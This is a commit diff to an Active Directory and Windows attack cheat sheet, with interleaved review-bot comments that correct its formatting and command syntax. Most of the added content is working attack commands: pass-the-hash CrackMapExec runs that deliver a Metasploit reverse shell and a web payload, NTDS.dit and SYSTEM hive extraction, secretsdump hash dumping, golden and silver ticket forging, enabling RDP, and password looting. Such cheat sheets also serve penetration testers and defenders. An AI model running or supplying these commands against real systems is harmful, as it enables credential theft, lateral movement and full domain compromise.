PassTheTicket + OpenShare + Tools(CME example)
parent
4cf28496e0
commit
cdc3adee51
|
@ -4,10 +4,12 @@
|
|||
* [Tools](#tools)
|
||||
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
||||
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||
* [Open Shares](#open-shares)
|
||||
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
||||
* [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
||||
* [Golden Tickets](#golden-tickets)
|
||||
* [Silver Tickets](#silver-tickets)
|
||||
* [Password in AD User comment](#password-in-ad-user-comment)
|
||||
* [Golden Tickets](#passtheticket-golden-tickets)
|
||||
* [Silver Tickets](#passtheticket-silver-tickets)
|
||||
* [Trust Tickets](#trust-tickets)
|
||||
* [Kerberoast](#kerberoast)
|
||||
* [Pass-the-Hash](#pass-the-hash)
|
||||
|
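Review bot: the table of contents now lists "Golden Tickets" and "Silver Tickets" twice with identical labels, first pointing at #golden-tickets / #silver-tickets and then at #passtheticket-golden-tickets / #passtheticket-silver-tickets; since this commit renames the headings to "### PassTheTicket Golden Tickets" and "### PassTheTicket Silver Tickets", the first pair's anchors no longer resolve. Drop the first pair and label the remaining entries to match the headings. The "Dumping AD Domain Credentials " entry also carries a trailing space inside the link text.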
@ -33,6 +35,7 @@ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
|||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
||||
```
|
||||
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
|
||||
```powershell
|
||||
|
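Review bot: the four crackmapexec lines pass the hash in two different forms, a bare NT hash on the `--shares` and `metinject` lines and the LM:NT form `":5858…"` on the `web_delivery` and `smbexec` lines; pick one form so readers do not assume the prefix changes behaviour, and mark `https://IP:PORT/posh-payload` as a placeholder to fill in. A one-line comment that the hash and the 192.168.1.x addresses are lab sample values would also help.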
@ -55,6 +58,20 @@ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-
|
|||
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||
```
|
||||
|
||||
## Open Shares
|
||||
```powershell
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||
ls # list files
|
||||
cd
|
||||
get # download files
|
||||
put # replace a file
|
||||
```
|
||||
|
||||
Mount a share
|
||||
```powershell
|
||||
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
|
||||
```
|
||||
|
||||
|
||||
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
|
||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||
|
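Review bot: the Open Shares block and the "Mount a share" block are fenced as ```powershell but contain Linux commands (`pth-smbclient`, `smbmount`); tag them bash. In the same block the bare `cd` has no target and no comment, unlike the `ls` / `get` / `put` lines; give it a placeholder directory. "GPO Priorization" should read "GPO Prioritization" (or "precedence").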
@ -106,6 +123,21 @@ vssadmin create shadow /for=C :
|
|||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
||||
```
|
||||
|
||||
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||||
```powershell
|
||||
Import-Module .\Copy-VSS.ps1
|
||||
Copy-VSS
|
||||
Copy-VSS -DestinationDir C:\ShadowCopy\
|
||||
```
|
||||
|
||||
**Using vssadmin**
|
||||
```powershell
|
||||
vssadmin create shadow /for=C:
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
|
||||
```
|
||||
|
||||
|
||||
**Using DiskShadow (a Windows signed binary)**
|
||||
```powershell
|
||||
diskshadow.txt contains :
|
||||
|
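Review bot: the new "Using vssadmin" block repeats the `vssadmin create shadow /for=C:` step that already appears in this hunk's context (`vssadmin create shadow /for=C :` followed by `Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit`); merge the two, keeping the fully worked copy lines for NTDS.dit and the SYSTEM hive. Add a comment that `HarddiskVolumeShadowCopy1` is the index reported by vssadmin and differs between hosts, and that `C:\ShadowCopy` must exist before the copy. "diskshadow.txt contains :" is prose sitting inside the opening ```powershell fence; move it above the fence.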
@ -118,6 +150,7 @@ delete shadows volume %someAlias%
|
|||
reset
|
||||
|
||||
then:
|
||||
NOTE - must be executed from C:\Windows\System32
|
||||
diskshadow.exe /s c:\diskshadow.txt
|
||||
dir c:\exfil
|
||||
reg.exe save hklm\system c:\exfil\system.bak
|
||||
|
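Review bot: "then:" and "NOTE - must be executed from C:\Windows\System32" are prose inside the DiskShadow code fence; turn them into `REM` comments or move them outside so the block is copy-pasteable. The hive saved by `reg.exe save hklm\system c:\exfil\system.bak` is the file the later secretsdump `-system` argument expects, so a comment tying the two together, plus a note that `c:\exfil` must exist first, would help.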
@ -126,11 +159,12 @@ reg.exe save hklm\system c:\exfil\system.bak
|
|||
**Extract hashes from ntds.dit**
|
||||
then you need to use secretsdump to extract the hashes
|
||||
```c
|
||||
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
||||
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
|
||||
```
|
||||
secretsdump also works remotely
|
||||
```c
|
||||
./secretsdump.py IP administrator@domain -use-vss
|
||||
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
|
||||
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
|
||||
```
|
||||
|
||||
|
||||
|
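Review bot: `./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss` uses a backslash between domain and user; Impacket's target syntax is domain/user@host, as the `PENTESTLAB/dc\$@10.0.0.1` line below it shows, and an unquoted backslash is consumed by the shell, so this should be `AD/administrator@domain`. Both fences are tagged ```c although they hold shell commands; tag them bash.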
@ -150,7 +184,7 @@ CrackMapExec module
|
|||
cme smb 10.10.0.202 -u username -p password --ntds vss
|
||||
```
|
||||
|
||||
## Password in AD User comment
|
||||
### Password in AD User comment
|
||||
```powershell
|
||||
enum4linux | grep -i desc
|
||||
There are 3-4 fields that seem to be common in most AD schemas:
|
||||
|
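Review bot: "There are 3-4 fields that seem to be common in most AD schemas:" is explanatory prose inside the ```powershell fence that holds the enum4linux command; close the fence after `enum4linux | grep -i desc` and put the sentence and the field list below it as text. enum4linux is a Linux tool, so bash is the better fence tag.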
@ -158,7 +192,7 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
|||
```
|
||||
|
||||
|
||||
### Golden Tickets
|
||||
### PassTheTicket Golden Tickets
|
||||
Forge a TGT, require krbtgt key
|
||||
|
||||
Mimikatz version
|
||||
|
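Review bot: renaming "### Golden Tickets" to "### PassTheTicket Golden Tickets" changes the heading anchor, so the existing table-of-contents entry `[Golden Tickets](#golden-tickets)` now dangles (the same applies to the Silver Tickets rename); update or remove those entries. "Forge a TGT, require krbtgt key" reads better as "Forges a TGT; requires the krbtgt key".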
@ -187,11 +221,36 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
|||
kerberos_ticket_list
|
||||
```
|
||||
|
||||
### Silver Tickets
|
||||
Forge a TGS, require machine accound password (key) from the KDC
|
||||
Using a ticket on Linux
|
||||
```powershell
|
||||
Convert the ticket kirbi to ccache with kekeo
|
||||
misc::convert ccache ticket.kirbi
|
||||
|
||||
Alternatively you can use ticketer from Impacket
|
||||
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
|
||||
|
||||
export KRB5CCNAME=/home/user/ticket.ccache
|
||||
cat $KRB5CCNAME
|
||||
|
||||
|
||||
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
|
||||
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||
```
|
||||
|
||||
### PassTheTicket Silver Tickets
|
||||
Forging a TGS require machine accound password (key) from the KDC
|
||||
```powershell
|
||||
Create a ticket for the service
|
||||
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
|
||||
|
||||
Then use the same steps as a Golden ticket
|
||||
misc::convert ccache ticket.kirbi
|
||||
export KRB5CCNAME=/home/user/ticket.ccache
|
||||
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||
```
|
||||
|
||||
### Trust Tickets
|
||||
|
||||
TODO
|
||||
|
||||
### Kerberoast
|
||||
```c
|
||||
|
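Review bot: "accound" is misspelled in both "machine accound password" lines, and "Forging a TGS require" should be "requires". The "Using a ticket on Linux" block is placed under "### Silver Tickets", but its `ticketer.py -nthash … -domain-sid … -domain amity.local mbrody-da` invocation has no `-spn`, so it forges a TGT (a golden ticket), not a service ticket; move it under the golden-ticket section or add the `-spn` form here. Several lines inside these fences are prose ("Convert the ticket kirbi to ccache with kekeo", "Alternatively you can use ticketer from Impacket", "NOTE: You may need to comment the proxy_dns setting…"); comment them or move them out of the fence. The `psexec.py` lines use `--dc-ip` while the secretsdump line earlier in this commit uses `-dc-ip`; Impacket's examples take the single-dash form. "### Trust Tickets" is still a bare TODO, and the Kerberoast fence is tagged ```c for what are shell commands.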
@ -275,6 +334,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
|
|||
|
||||
|
||||
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||
Check if the patch is installed : `wmic qfe list | find "3139914"`
|
||||
```
|
||||
Powershell:
|
||||
https://www.exploit-db.com/exploits/39719/
|
||||
|
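Review bot: the fence opened right after the `wmic qfe list | find "3139914"` check has no language tag and contains "Powershell:" and an exploit-db URL rather than code; either close it and present the link as text, or tag it and keep only commands inside. The patch check itself is the right first step: KB3139914 is the MS16-032 fix, so if it is listed the host is patched and the rest of the section does not apply.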
@ -314,5 +374,6 @@ net group "Domain Admins" hacker2 /add /domain
|
|||
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
|
||||
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
||||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
||||
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
||||
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
||||
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
|
|
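Review bot: the reference list now contains duplicates: the ropnop "Fun with LDAP, Kerberos (and MSRPC)…" deck appears both as `*[Fun with LDAP…` (missing the space after `*`, so it will not render as a list item) and as `* [Fun with LDAP…`, and the bohops DiskShadow entry appears twice. Keep one copy of each with the `* ` prefix.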
@ -56,3 +56,4 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
|||
|
||||
## Thanks to
|
||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
|
@ -92,28 +92,29 @@ net share
|
|||
|
||||
## Looting for passwords
|
||||
|
||||
Search for file contents
|
||||
### Search for file contents**
|
||||
```powershell
|
||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||
```
|
||||
|
||||
Search for a file with a certain filename
|
||||
### Search for a file with a certain filename
|
||||
```powershell
|
||||
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||||
```
|
||||
|
||||
Search the registry for key names
|
||||
### Search the registry for key names
|
||||
```powershell
|
||||
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||||
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||
```
|
||||
|
||||
Read a value of a certain sub key
|
||||
### Read a value of a certain sub key
|
||||
```powershell
|
||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||
```
|
||||
|
||||
Password in unattend.xml
|
||||
### Password in unattend.xml
|
||||
Location of the unattend.xml files
|
||||
```powershell
|
||||
C:\unattend.xml
|
||||
C:\Windows\Panther\Unattend.xml
|
||||
|
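Review bot: "### Search for file contents**" keeps a stray trailing `**` from the old bold label; the other labels converted to headings in this hunk ("### Search for a file with a certain filename", "### Search the registry for key names", …) do not, so drop it. The `REG QUERY … /F "password" /t REG_SZ /S /K` lines search key names only (`/K`), which matches the heading, but passwords usually sit in value data; a sibling line using `/d` (search data only) would make the "Looting for passwords" section more complete.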
@ -121,6 +122,8 @@ C:\Windows\Panther\Unattend\Unattend.xml
|
|||
C:\Windows\system32\sysprep.inf
|
||||
C:\Windows\system32\sysprep\sysprep.xml
|
||||
```
|
||||
|
||||
Example content
|
||||
```powershell
|
||||
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
|
||||
<AutoLogon>
|
||||
|
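Review bot: the "Example content" block is XML from unattend.xml but is fenced as ```powershell; tag it ```xml so the `<component …>` / `<AutoLogon>` markup is highlighted correctly and readers do not take it for a command.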
@ -182,4 +185,6 @@ powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadS
|
|||
## Thanks to
|
||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
|
||||
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
|
|
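Review bot: "Windows Privilege Escalation Fundamentals" (the fuzzysecurity tutorial 16 link) is listed twice in this "Thanks to" list; remove one of the two entries.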
@ -68,16 +68,20 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
|||
```
|
||||
|
||||
## RDP Remote Desktop Protocol (Impacket)
|
||||
```
|
||||
```powershell
|
||||
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
|
||||
```
|
||||
|
||||
Note: you may need to enable it with the following command
|
||||
```
|
||||
```powershell
|
||||
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||
netsh firewall set service remoteadmin enable
|
||||
netsh firewall set service remotedesktop enable
|
||||
```
|
||||
|
||||
or with psexec(sysinternals)
|
||||
```
|
||||
```powershell
|
||||
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||
```
|
||||
|
||||
|
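Review bot: the RDP blocks are now tagged ```powershell, but the first one holds Linux commands (`python rdpcheck.py …`, `rdesktop …`); tag that one bash and keep powershell for the `reg add` / `netsh` / `psexec` blocks. The `netsh firewall` context used here is the legacy one; `netsh advfirewall firewall` is the current equivalent on Vista and later, which is what the rest of this page targets.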
@ -86,6 +90,12 @@ For Server 2012 R2, Win8.1+
|
|||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
||||
```
|
||||
|
||||
with Metasploit
|
||||
```powershell
|
||||
run getgui -u admin -p 1234
|
||||
```
|
||||
|
||||
|
||||
## Netuse (Windows)
|
||||
```
|
||||
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
|
||||
|
|
|
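Review bot: the "## Netuse (Windows)" fence at the end of the hunk is a bare "```" while the Metasploit block just above gained a ```powershell tag; tag it too for consistency. The `xfreerdp … /pth:` line sits under "For Server 2012 R2, Win8.1+" because pass-the-hash over RDP only works when Restricted Admin mode is enabled on the target; saying so explicitly next to the command would help readers understand why it fails elsewhere.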
@ -1,7 +1,7 @@
|
|||
# Payloads All The Things
|
||||
A list of useful payloads and bypasses for Web Application Security.
|
||||
Feel free to improve with your payloads and techniques !
|
||||
I <3 pull requests :) You can also contribute with a beer IRL or a [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
||||
I <3 pull requests :) You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
||||
|
||||
Every section contains:
|
||||
- README.md - vulnerability description and how to exploit it
|
||||
|
|